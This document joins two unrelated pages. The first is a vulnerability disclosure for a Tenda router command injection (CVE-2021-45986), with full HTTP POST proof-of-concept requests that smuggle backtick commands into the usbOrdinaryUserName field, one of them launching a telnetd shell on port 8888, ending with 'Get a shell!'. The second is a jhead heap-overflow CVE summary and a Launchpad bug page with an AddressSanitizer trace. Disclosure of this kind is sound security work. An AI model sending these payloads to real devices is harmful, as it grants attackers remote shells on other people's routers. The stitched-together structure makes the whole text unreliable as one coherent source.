Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `httpd` binary:

In `formSetUSBShareInfo` function, `usbOrdinaryUserName` is directly passed by the attacker, so we can control the `usbOrdinaryUserName` to attack the OS.

As you can see here, the input has not been checked. And then, call the function setValueIfNotNull to store this input.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/1.png)

In `netctrl` binary:

In `samba_change_cfg` function, the initial input will be extracted and cause command injection.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/2.png)

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/3.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `usbOrdinaryUserName` as **`/usr/sbin/telnetd`guest** , and the router will excute it,such as:

POST /goform/setUSB HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 124
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/USB/usbFileShare.html?0.38914363317516376
Cookie: \_:USERNAME:\_=; G3v3\_user=

usbPrivilegedUserName=admin&usbPrivilegedUserPwd=admin&usbOrdinaryUserName=\`/usr/sbin/telnetd\`guest&usbOrdinaryUserPwd=guest

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/4.png)

We set `usbOrdinaryUserName` as **`telnetd -l /bin/sh -p 8888 -b 0.0.0.0`guest** , and the router will excute it,such as:

POST /goform/setUSB HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 144
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/USB/usbFileShare.html?0.38914363317516376
Cookie: \_:USERNAME:\_=; G3v3\_user=

usbPrivilegedUserName=admin&usbPrivilegedUserPwd=admin&usbOrdinaryUserName=\`telnetd -l /bin/sh -p 8888 -b 0.0.0.0\`guest&usbOrdinaryUserPwd=guest

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/5.png)

**Result**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/6.png)

Get a shell!

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/7.png)

CVE-2021-45986: my_vuln/2.md at main · pjqwudi/my_vuln

JHEAD is a simple command line tool for displaying and some manipulation of EXIF header data embedded in Jpeg images from digital cameras. In affected versions there is a heap-buffer-overflow on jhead-3.04/jpgfile.c:285 ReadJpegSections. Crafted jpeg images can be provided to the user resulting in a program crash or potentially incorrect exif information retrieval. Users are advised to upgrade. There is no known workaround for this issue.

Bug #1900821 reported by fengzhaoyang on 2020-10-21

This bug affects 1 person

Affects

Status

Importance

Assigned to

Milestone

​

jhead (Ubuntu)

Confirmed ![](https://bugs.launchpad.net/@@/edit)

Undecided

Unassigned

You need to log in to change this bug's status.

Affecting:

jhead (Ubuntu)

Filed here by:

fengzhaoyang

When:

2020-10-21

Confirmed:

2020-10-21

Target

Distribution

Package

(Find…)

Project

(Find…)

Status

Importance

Undecided

Assigned to

Nobody

Me

Comment on this change (optional)

Email me about changes to this bug report

**Bug Description**

fstark@fstark-virtual-machine:~/jhead$ ./jhead fuzz1\\:id\\:000015\\,sig\\:06\\,src\\:000476\\,time\\:412880\\,op\\:arith8\\,pos\\:31\\,val\\:+29  
\=======\=======\=======\=======\=======\=======\=======\=======\=======\==  
\==957==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efd2 at pc 0x7f6d38f94676 bp 0x7ffd0abe47d0 sp 0x7ffd0abe3f78  
READ of size 4 at 0x60200000efd2 thread T0  
    #0 0x7f6d38f94675 in memcmp (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x77675)  
    #1 0x40e810 in ReadJpegSections /home/fstark/jhead/jpgfile.c:285  
    #2 0x410e86 in ReadJpegSections /home/fstark/jhead/jpgfile.c:125  
    #3 0x410e86 in ReadJpegFile /home/fstark/jhead/jpgfile.c:378  
    #4 0x40858b in ProcessFile /home/fstark/jhead/jhead.c:905  
    #5 0x402f2c in main /home/fstark/jhead/jhead.c:1756  
    #6 0x7f6d3886a83f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
    #7 0x406708 in \_start (/home/fstark/jhead/jhead+0x406708)

0x60200000efd2 is located 0 bytes to the right of 2-byte region \[0x60200000efd0,0x60200000efd2)  
allocated by thread T0 here:  
    #0 0x7f6d38fb5602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)  
    #1 0x40e4a8 in ReadJpegSections /home/fstark/jhead/jpgfile.c:172

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 memcmp  
Shadow bytes around the buggy address:  
  0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
\=>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa\[02\]fa fa fa 02 fa  
  0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
  Addressable: 00  
  Partially addressable: 01 02 03 04 05 06 07  
  Heap left redzone: fa  
  Heap right redzone: fb  
  Freed heap region: fd  
  Stack left redzone: f1  
  Stack mid redzone: f2  
  Stack right redzone: f3  
  Stack partial redzone: f4  
  Stack after return: f5  
  Stack use after scope: f8  
  Global redzone: f9  
  Global init order: f6  
  Poisoned by user: f7  
  Container overflow: fc  
  Array cookie: ac  
  Intra object redzone: bb  
  ASan internal: fe  
\==957==ABORTING

Tag

#ubuntu